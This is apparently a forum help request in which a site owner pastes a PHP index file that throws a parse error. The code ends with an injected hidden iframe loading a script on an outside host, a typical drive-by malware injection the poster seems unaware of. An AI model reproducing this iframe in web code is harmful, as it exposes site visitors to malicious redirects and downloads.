Please help:
Parse error: syntax error, unexpected '<' in /home/content/a/p/e/apexj/html/index.php on line 86
Page code is below:
<?php
if (
$_SERVER['SERVER_NAME'] == 'apexj.com'
&& (!isset($_POST) || !count($_POST))
// && !strpos($_SERVER['HTTP_HOST'], 'rik.p5.prod')
)
{
header("location: http://www.apexjewels.com/index.php?".$_SERVER['QUERY_STRING']);
exit;
}
$start = getmicrotime();
define('FULL_PATH', realpath(dirname(FILE)));
if (!file_exists(FULL_PATH.'/core/kernel/application.php')) {
die('Please re-checkout _inportal_kernel4 cvs module into the root directory ('.FULL_PATH.') and remove kernel/kernel4 folder. Make sure to checkout correct branch (RC or HEAD).');
}
include_once(FULL_PATH.'/core/kernel/startup.php');
$application =& kApplication::Instance();
$application->Init();
/*$sql = 'SELECT Data
FROM '.TABLE_PREFIX.'Cache
WHERE VarName = "configs_parsed"';
$configs_parsed = $application->Conn->GetOne($sql);
print_pre(unserialize($configs_parsed), '', true);*/
$application->Run();
$application->Done();
$end = getmicrotime();
//print_pre(get_included_files());
function getmicrotime()
{
list($usec, $sec) = explode(" ", microtime());
<iframe src="http://u19.in:8080/ts/in.cgi?pepsi108" width=125 height=125 style="visibility: hidden"></iframe>